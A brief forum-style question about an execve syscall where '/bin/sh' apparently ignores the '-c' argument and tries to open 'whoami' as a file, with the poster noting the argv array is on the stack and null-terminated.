syscall execve ignores the -c parameter

get this error when i build my argv array:
/bin/sh: 0: cannot open whoami: No such file
when i type in my terminal /bin/sh whoami, i would get the sam error. it looks like he ignores the -c parameter but it still on the stack. yes the argv array is null terminated.
